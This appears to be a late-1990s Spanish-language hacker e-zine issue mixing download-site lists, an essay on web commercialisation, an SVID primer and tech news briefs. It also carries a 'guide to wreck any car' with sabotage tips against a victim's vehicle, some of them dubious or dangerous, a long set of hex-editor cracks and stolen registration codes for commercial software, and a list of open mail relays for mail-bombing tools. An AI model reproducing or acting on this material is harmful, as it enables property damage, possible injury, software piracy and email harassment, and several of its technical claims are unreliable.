www.download.com......................Famoso, buscate los antivirus actuales.
www.shareware.com.....................Base con mas de 160.000 programas.
www.hotfiles.com
www.tucows.com........................Todo Windows y comunicaciones (winsock)
www.coast.net/simtel
www.cdrom.com
sunsite.unc.edu

MULTIBUSCADORES
===============
www.metacrawler.com
www.designlab.ukans.edu/profucion
www.robtex.com/search.thm
www.cyber411.com

LISTA DE SERVIDORES ARCHIE
==========================
http://web.nexor.co.uk/archie.html

NOTA DEL AUTOR
==============

Quiero mencionar, que por lo que he visto, se tiende a usar y no abusar de
los graficos y fotos, que tanto nos desesperan y relentizan nuestro PC, en las
paginas destinadas al hacking, abundando en su lugar, una buena predisposicion
para la informacion. Acondicinamiento de los fondos que le dan realce,
visivilidad y mejor lectura de las letras o caracteres de dichos textos, y una
mayor abundancia de informacion.

UN SALUDO DE C. COLON

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

"World Wide Web = El Mercado mas grande del mundo."
Por 12r43lOverdrive.
Para RaregaZz.

Cada dia nos acercamos mas al paradigma planteado por Gibson en su
novela "Neuromante", la cual plantea una sociedad basada en una red global
de informacion, que como en la realidad tiene muchas fallas y no es
lo que en un principio se planteo como la "Supercarretera de Informacion".

Ahora vemos el gran auge de tecnologias como Java, DHTML, VRML,
ActiveX, Realaudio, entre algunas otras las cuales son aplicadas al Web (en
algunos casos con gran acierto pero en algunos otros con un abuso de estos)
para tener una interaccion con la red mas amigable y natural, aun recuerdo
los viejos dias del Web, con simples y rapidos archivos HTML, navegando con
NCSA Mosaic y obteniendo la informacion mas rapido y sin tantas demoras, esto
con la desventaja de ser poco amigable y por lo general solo usada por gente
relacionada con investigacion, sistemas y educacion. En la actualidad desde
cientificos hasta amas de casa usan el web, con los beneficios y desventajas
que esto conlleva.

Creo que el web se ha convertido en un supermercado gigantesco, el
cual ha pasado a manos de las grandes corporaciones y grupos con fines
lucrativos, los cuales saturan los servicios de propaganda, esto ha llegado
al punto de ser paranoico ya que en la mayoria de paginas encuentras
propaganda y mas aun, proliferan las cookies a las que considero una invasion
a la privacidad, es insoportable tener que estar cuidandose de ellas.

Ahora otro tema muy importante es el acceso a la red, muchos
proveedores ofrecen sus servicios teniendo equipos en mal estado y obsoletos
para permitir un acceso rapido al web, aparte de la negligencia del
departamento de soporte tecnico, es totalmente injusto pagar por un servicio
en mal estado y ademas caro.

Si uno quiere tener una pagina y correo electronico implica un costo
extra, ademas de ser elevado, los proveedores ofrecen muy poco espacio para
estos servicios, aunque existen servicios "gratuitos" como Geocities y Hotmail
para paginas web y correo electronico respectivamente, muy poca gente sabe de
su existencia y es estafada por una pagina de menos de 2MB y una cuenta de
correo de similar capacidad, aparte del cobro del dise¤o de la pagina y de la
configuracion de la cuenta en su PC.

Para concluir, el Web se ha convertido en el negocio del siglo, si no
preguntenle a DEC, Apple o Yahoo entre otros muchos, lo que en un principio
fue creado como un medio de compartir informacion se ha transformado en un
medio de lucro y abuso, claro aun se encuentra la suficiente libertad en el
Web para conservar su espiritu pero la pregunta es: ¨Cuanto durara esta
libertad?. 1998

12r43lOverdrive.

Me despido deseandoles lo mejor.
12r43lOverdrive. "Muerte a la opresion y a los opresores".

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

---------------------------------------------------------------------
-----------UNIX SISTEM V Interface Definition (SVID).----------------
--------------------Por 12r43l Overdrive-----------------------------
----------------------arcanos@mail.org-------------------------------

Pocas veces nosostros al programar alguna cosa nos preocupamos
por como se va ha comportar nuestro programa en otras maquinas
debido a esto muchas veces nos llevamos la sorpresa de que una
aplicacion robusta no corre en alguna maquina con el mismo
sistema operativo (SO) Aun mas, con la gran variedad de sabores
de UNIX y por la importancia de este SO para el hacking, es de
gran utilidad saber como se va a comportar nuestro programa en
UNIX asi sea AT&T SISTEM V, SUN OS, IRIX, HP-UX, AIX 6000,
LINUX etc...
Por eso me he propuesto escribir una serie de articulos que nos
pueden ayudar a esto.Agradeceria cualquier comentario acerca de
estos articulos, aqui vamos!.

---INTRODUCCION---


¨SVID?

SVID especifica el ambiente del sistema operativo que permite
crear aplicaciones de software que son independientes de plataformas
de hardware. El SVID se aplica en el rango de computadoras personales a
mainframes. El SVID especifica los componentes del sistema operativo
disponibles para desarrollo de programas, define la funcionalidad de
los componentes pero no la implementacion de estos. El SVID especifica
la interfaz entre el codigo fuente y cada componente del sistema
operativo, asi como el comportamiento a la hora de correr. Lo mas
importante es la definicion de un ambiente comun para la aplicacion de
software y el usuario final.

Cualquier aplicacion escrita usando solamente componentes definidos en
el SVID debe ser compatible y portable en cualquier computadora que
soporte el "System V Interface" (SVI).El codigo fuente puede ser
re-compilado para mover una aplicacion a una nueva computadora que soporte
el SVI, la presencia y el comportamiento de este y sus componentes es
definido por el SVID.

El SVID esta organizado en el Base System Definition y en una serie de
Definicion de Extensiones. El Base System Definition especifica los
componentes que todo sistema operativo basado en el System V debe proveer.
Las Extensiones del Base System son opcionales en los sistemas operativos
basados en el System V pero cuando un componente esta presente y ocupa de
estas extenciones, es recomendable especificarlo.

El SVID provee a los desarolladores y a usuarios finales de las
caracteristicas y funciones disponibles para cada uno de ellos en cualquier
sistema operativo basado en el System V.

El SVID esta basado en el POSIX 1003.1-1988 Full Use Standard,X3.159-1989
(ANSI C), y en ISO/IEC 9899-1990 (ISO C).

¨Quien usa el SVID?

Por lo general lo usan desarrodaroes de aplicaciones para UNIX y busca que
estas sean portables entre sistemas operativos basados en el SYSTEM V
(Hacking? genial! no?).

1.- Base System.

La funcionalidad del Base System ha sido estructurada para proveer un
ambiente standard de ejecucion para programas escritos en un lenguaje
de alto nivel como C. Esto con la finalidad de que al migrar una
aplicacion a un SO en otra plataforma solo se a¤adan las extensiones
del Base System si es que son requeridas.

2.- Extensiones del Base System.

Estas extenciones han sido construidas para hacer disponible un camino
robusto para incrementar funcionalidades al SO y asi generar aplicaiones
mas complejas. Dependiendo de la complejidad de nuestra aplicacion es
como vamos a requerir estas extensiones.

Por el momento es suficiente recomiendo analizar e investigar mas al respecto
ya que un poco mas de info no hace da¤o ;-)

Fuente:
SYSTEM V INTERFACE DEFINITION.
Third edition.
UNIX SYSTEM LABORATORIES.

Z80Z80Z80Z80Z80Z80Z80Z80Z80
Z80.12r43lOverdrive1997.Z80
Z80Z80Z80Z80Z80Z80Z80Z80Z80

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

LA GUIA PARA JODER CUALQUIER AUTOMOVIL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MUCHO DA¥O
~~~~~~~~~~
o Toma un frasco de medicina controlada (los botecitos de plastico cafe)
y llenalo de Drano (destapa-ca¤os). Echalo al tanque de gasolina y
retirate. El drano liquido se comera el frasco y BOOM!
Primero intenta con varios frascos y elige el que tarde mas en quemarse

DA¥O MEDIO
~~~~~~~~~~
o Agarra una pieza peque¤a de aluminio y pegalo entre el encendedor y el
filamento creando una union. Despues, si el carro esta prendido o no, el
encendedor vaciara la bateria. La bateria del carro morira misteriosamente
y cuando le pase energia, en dos o tres dias volvera a morir :-)

o Coloca un poco de mierda de gato fresca y ponla en el techo o cofre del
carro en un dia soleado y los acidos se comeran el metal!

o Toma una pelota de ping-pong y ponla en el tanque de gas. Despues, cuando
maneje unas 5 o 10 millas, la pelota tapara el tanque y el carro se
detendra como si le faltara gasolina. La victima llenara el tanque y el
carro funcionara de nuevo... unas 5 millas mas. >;-)

o Toma unas 12 o 15 pelotitas de esas para evitar la humedad en cajas o
cajones y ponlas en el tanque de gas. Esto hara que el nivel de octano
en la gasolina sea altisimo lo que hara que el motor no pueda pararse.

DA¥O MENOR
~~~~~~~~~~
o Pon grasa sucia por todo el mofle. Cuando el mofle se caliente empezara
a levantar humo negro.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù
______________________
/ /_______________________
/ CRACKS - HACKS Y KAOS CON UN HEXEDITOR /\
/____________________ / /
\___________________/ <<::RareGaZz::>> / /
/________________________/ /
\________________________\/


En este texto les presentamos una manera rapida y sencilla de registrar sus
programas favoritos. Antes de modificar un archivo con un editor tienes que
hacer un respaldo no vaya ser que la jodas y bueno, te quedes sin nada :-)
Un editor hexadecimal (Hedit) viene incluido en RareGaZz #2

Como crackear 3D Studio release 4 con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Remueve la defensa harlock
3DS.EXE
0005ACD8: 3D B8
0005ACDD: 74 EB
0006D282: 56 B8
0006D283: 68 B2
0006D284: C8 AA
0006D285: 27 FE
0006D286: 03 5B
0006D287: 00 C3
000874B9: 3D B8
000874BE: 74 EB
0008C0B1: 3D B8
0008C0B6: 74 EB
001041A2: 75 90
001041A3: 12 90
0011F84A: 56 B8
0011F84B: 68 4A
0011F84C: C8 52
0011F84D: 27 50
0011F84E: 03 7A
0011F84F: 00 C3
00126C92: 56 B8
00126C93: 68 9E
00126C94: 68 28
00126C95: A3 83
00126C96: 02 45
00126C97: 00 C3
00182B8A: 56 B8
00182B8B: 68 82
00182B8C: 64 26
00182B8D: 68 98
00182B8E: 07 30
00182B8F: 00 C3

Aldas (dcx@pub.osf.lt)

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear 4-D Boxin con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Encuentra la siguiente linea en el archivo 4DBMCGA.EXE

32 B8 05 46
Conviertela a:
32 B8 05 0A

EE 03 E1 05 FD 07 01 08 11 0A 20 0C 31 0E 00 1C 50 00
Conviertela a:
D1 03 E0 05 F4 07 00 08 10 0A 27 0C 30 2F 00 1C 50 00

Cuando veas la cara de un boxer, presiona enter 2 veces.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear 4OS/2 v.2.51 build 43 (32 bits) con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Encuentra lo siguiente en el archivo 4os2.exe (219.040 bytes)

8B 5D E8 83 FB 06 77 25
Conviertelo a:
BB 00 00 00 00 90 90 90

cracked by: Dark Wing

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Accolade Software con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Funciona con: 4th& Inches, Test Drive, Fast Break, y otro Accolade software.

Encuentra:
55 56 57 06 1E
cambia a:
31 C0 C3 06 1E

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Adept BBS v1.07 para OS/2:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Crea un archivo llamado: adeptbbs.reg

Pon la siguiente informacion dentro de el:

Name: (20 espacios) Creeping Death
Rego No. (17 espacios) 3599887846
Rego Serial No. (10 espacios) 806949176

Los espacios son importantes para que funcione el crack.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear ANSIPLUS v.3.02 con un Hex-editor.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Encuentra lo siguiente en el archivo ANSIPLUS.SYS

Busca: 56 33 DB 3E 39 82

Convierte a: 56 33 DB 3E 8B 82


Busca: 6C 00 81 C3 A4 00

Convierte a: 6C 00 81 C3 00 00


Busca: F4 63 97 65 E2 65 39 66 97 65

Convierte a: F4 63 97 65 E7 66 E7 66 E7 66

Por: Johnny Crack

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Para hacer que ARJ v2.30 Secure haga chequeos AV haz esto:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cambia los siguientes bytes en arj.exe

Cambia 3530 de 75/05 a EB/0D
Cambia 4568 de 75/06 a EB/0C
Cambia 6555 de 75/06 a EB/0C
Y el seguro de ARJ funcionara!

Agarra un archivo ARJ ya hecho.
Escribe : ARJ z FILE.ARJ AV (nombre)

Las direcciones de los bytes estan en DECIMAL !.
Solo funciona con Arj v2.30

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como registrar BackAlley con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Archivo : BACKALLY.EXE

Busca : A0 40 04

Cambia a : B0 01 90

Por: Krynos

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear BAChurch con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Archivo : BACHURCH.EXE

Busca : A0 30 04

Cambia a : B0 01 90

Por: Krynos

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Buttons 4 Dos 6.0:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Abre un editor de textos (MS-Edit)
2. Abre el archivo Buttons.ini
3. Veras esta linea:

".. Register Y "

Limpia Register y pon tu nombre.

Ejemplo:

".. RareGaZz Y "

Salva el archivo.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear CD-Maker Pro v.1.2 para Windows(95) con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CDMAKER.exe
BD14B 74 --> EB
BD14C 03 --> 3B

CDCOPY.exe
0B01F 04 --> 00
1965F 75 --> EB

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

CD MASTER 3.1
~~~~~~~~~~~~~
Crea un archivo de nombre CDPLAYER.REG
y con un Hex-Editor pon estos comandos:

4F 4B 57 41 52 45 0D 0A 35 34 43 03 0D 0A

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Cool Edit ®v1.51:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

En la pantalla de registro escribe tu nombre y pon como numero de serie
_ ANSWERME _. Cool Edit te dira que numero de serie es.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Registro para Cooledit para Windows 95.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copia el archivo cool.ini a tu directorio de windows y edita:

[Registration]
Garbleflux=5397
User=The Free Debugger / Dementia
Number=DEMENTIA

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Dbase v4.11 con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Archivo : INSTALL.EXE

Busca : 74 1A FF 46 FE

Cambia a : EB 1A FF 46 FE

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear GifLite v2.0 con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Archivo : Giflite.exe

Busca : C6 06 F3 00 01 C4

Cambia a : C6 06 F3 00 00 C4

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear GRAPHIC WORKSHOP 6.1u para DoS:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Archivo : GWSINSTL.EXE
Busca : 83 C4 04 3B 06 D0 18 74 IF
Cambia a : 83 C4 04 90 A1 D0 18 75 IF

Archivo : GWS.EXE
Busca : 83 C4 04 3B 06 58 03 75 2C
Cambia a : 83 C4 04 90 A1 58 03 74 2C

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear LORDTRX v1.10 con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Encuentra lo siguiente en LORDTRX.EXE:
0B C0 75 08 C7 06

Cambialo a:

31 C0 75 08 C7 06

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

NEOPAINT 1.0
~~~~~~~~~~~~
Archivo : NEOPAINT.EXE

Busca : 80 3E 06 07 00

Cambia a : C6 06 3E 06 01

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear Paint Shop Pro v3.0 con un Hex-Editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Busca en PSP.EXE lo siguiente:

83 C4 02 0B C0 74 0D
Cambialo a:
88 26 86 00 90 EB 2D

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear The Draw con un Hex-editor:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Archivo : TheDraw.exe
Busca : 08 C0 74 C2 89 EC 5D CA
Cambia a : 08 C0 75 C2 89 EC 5D CA

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Como crackear WebEdit v1.4b para Win95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Busca en el directorio System de windows el archivo Sysdvrxl.drv y cambiale
el nombre a cualquier cosa. Listo!

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

CoolEdit96
Codigos de registro

Name: tHATDUDE PC96
Code: HFCMGACK

Name: tHATDUDE PC97
Code: GGRGEGSI

Name: PhRoZeN CReW 97
Code: SIYVBHZE

Name: PhRoZeN CReW
Code: MPULQSZB

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

---> Cracks recopilados de internet.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Ú¿Ú ÚÄ¿ Â Â ÚÄ¿ Â Â ÚÄ¿ Â Â ÚÄ¿ ÚÄ¿ Ú¿Ú Â Â ÚÄ¿ ÚÄ¿
³³³ ÃÄ ³³³ ÚÄÙ ÀÂÙ ³ ³ ³ ³ ³ ÃÄ´ ³³³ ³ ³ ÀÄ¿ ÃÄ
ÁÀÙ ÀÄÄ ÀÁÙ ÀÄÙ Á ÀÄÙ ÀÄÙ ÀÄÄ Á Á ÁÀÙ ÀÄÙ ÀÄÙ ÀÄÄ
By: Groovy Dooby.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

America Online firmo con Cybermeals (comidas ciberneticas), y para abril
espera que mas de 25,000 restaurantes puedan entregar comidas ordenadas por
internet.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

En la batalla contre el spam (email no solicitado) con America Online, la
Organizacion de Comercio en Internet (http://www.noic.org/) dice que pondra
en internet 5 millones de direcciones de email de los usuarios de AOL.
America Online llama a eso cyber-terrorismo.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Hotmail dice tener 9.2 millones de usuarios activos y dicen que pueden pasar
a America Online (AOL con 10 millones) como numero 1.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Microsoft Corp. compro al proveedor de email gratuito Hotmail.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Hackers haciendose llamar PANTS/HAGIS entraron al sistema de Yahoo, el sitio
mas popular de internet, poniendo una nota para la liberacion del Hacker
Kevin Mitnick y diciendo que cualquier persona que haya usado Yahoo desde
una terminal de red en el mes pasado tiene una bomba logica en su red.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

La primer maquina de busqueda amigable con la familia esta en internet.
Net Shepherd http://family.netshepherd.com/ utilizando AltaVista, dice haber
`clasificado' un millon y medio de paginas de 500,000 sitios web. No busca
material no adecuado para la familia y varia en grados que puedes especificar
mientras buscas. La Fundacion

  
de Libertad Electronica ya la ha atacado.
http://www2.epic.org/reports/filter_report.html

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

El regalo de ahora: Cosmopolitan's Virtual Makeover CDROM ($40) es un paquete
que te permite scannear tu foto y cambiarle el estido de peinado, makeup,
pesta¤as,etc. Todo en la privacidad del hogar. http://www.virtualmakeover.com

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

IDT Corp. Finalmente saco al mercado Net2Phone Direct, un servicio para hacer
llamadas por internet a cualquier telefono regular por 8 centavos el minuto.
Intentalo en 1-800-CALL-IDT http://www.net2phone.com/

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

La conferencia de la Organizacion de las Naciones Unidas sobre el
calentamiento de la tierra sera la mayor transmision por internet. Se usaran
16 servidores y mirror sites para mostrar los discursos oficiales y otros
eventos en 7 lenguajes.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

La maquina de busqueda Lycos se convirtio en la primera maquina de busqueda
que empezo a insertar algunas de sus propias paginas como los primeros
resultados. Otras maquinas lo hacen, pero siempre en los lados. www.lycos.com

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

El controversial filtro de pornografia CyberPatrol esta de nuevo en las
noticias con la salida de un reporte sobre los sitios bloqueados, incluyendo
Air Penny (un sitio de Nike), un servicio de atencion a mascotas, El sitio
de MIT's sobre el proyecto matematico, 90,000 sitios de musica en Geocities,
WordPlay (antes AT&T's Imagination Network), etc. etc.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

IBM definitivamente se sale de el gran show en las Vegas COMDEX

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

China sigue poniendo restricciones para el uso de Internet

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

WebTV al parecer llega a Ensenada, Mexicali y Tijuana Baja California Mexico.
Tel. Ensenada: 738556

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

El pleito entre Microsoft contra el Departamento de Justicia termino. La
compa¤ia de software y el Gobierno han puesto sus papeles en linea.
http://www.microsoft.com/corpinfo/doj/doj.htm
http://www.usdoj.gov/atr/cases3/micros2/micros0.htm

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Los problemas del a¤o 2000 estan apareciendo. Visa reporta que, a pesar de
un tremendo esfuerzo empezado en 1996, 42,000 de los 14 millones de
establecimientos que aceptan su tarjeta piensan que el a¤o de caducidad 00 ya
expiro y no aceptan las tarjetas.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Yahoo! lanzara con America Online (AOL) `Yahoo Online' con MCI, mandando por
correo CDs, etc.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

(Tomada del diario El Colombiano, Medellin 25-I-98)
Netscape Communications, la empresa lider de programas para Internet,
distribuira gratuitamente de ahora en adelante su programa de navegacion en
Internet, anuncio su presidente y director general, Jim Barksdale. Netscape
imita asi a su principal rival, el gigante Microsoft, que avanzo
peligrosamente en parte del mercado. La sociedad de Mountain View(California)
tambien hara publica la tecnologia de la proxima generacion de su serie de
programas para Internet, Communicator 5.0, indico Barksdale.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Por amenazas de muerte AMNISTIA INTERNACIONAL se va de Colombia (amenazas
de las fuerzas militares Colombianas obviamente). Un informe de A.I. la
semana pasada acuso a las F.F.M.M. Colombianas de masacres campesinas y
violacion de derechos humanos!! (Que fueron negadas por los Militares).

[ En el mundo no solo hay un Chiapas... :'( ]

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Toshiba impacto al mercado de las laptop con el primer dise¤o de costo menor
a los $2,000 dlls. La Satellite 305CDS, con 16 MB RAM y procesador a 166MHZ
con modem K56flex, se vende a $1,700. El precio de las laptop se espera que
baje mas alla de los $1,500 dlls para este verano.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

El primer virus de hoja de calculo ha aparecido en Francia. El virus "paix.a
virus" es transmitido en las formulas de las hojas de calculo de Excel. No
es un virus que dependa en macros como los anteriores.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

En 1997, por la primera vez, NT se vendio mas que UNIX, y por lo doble.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

http://www.egghead.com/
Egghead Software cerrara sus puertas y tratara de vender unicamente en i-net.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

Mexico ha montado monstruosas Banderas de 164 por 94 pies colgadas de
gigantescos postes de 109 toneladas como del tama¤o de tres campos de
football de altura en tres lugares directamente en la frontera con los
Estados Unidos Americanos por El Paso, San Diego y Loredo TX. Ninguna de las
ciudades de Estados Unidos puede justificar el costo de un proyecto de esa
magnitud para su bandera.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

http://www.safersmokes.com/
Para aquellos delicados al tabaco, los cigarros "Bravo" de lechuga son mucho
mas seguros. De venta en internet a $3.75 dlls. el paquete.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

http://www.aidem.com.sg/madonna/frozen.htm
Warner Brothers esta enojado por que "Frozen" un single del album aun sin
salir "Ray of Light" ya esta en internet.

'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

.o B 0 0 /\/\ 3 R 4 N G o.
`tu linea de comunicacion con el under.'


*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

CODIGO DE REGISTRO
mIRC ver 5.02 name: mIRC Supporter S/N: 17394-1986741

*^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

Servidores SMPT para usar con programas como Upyours y Kaboom.
(algunos de ellos no imprimen la I.P.)

rome.ccomm.com
wisdom.psinet.net.au
emout17.mail.aol.com
mdr.de
manado.webindonesia.com <------ Bueno.
emout29.mail.aol.com
from m16.boston.juno.com
eleventh2.inil.com <------ Muy rapido.
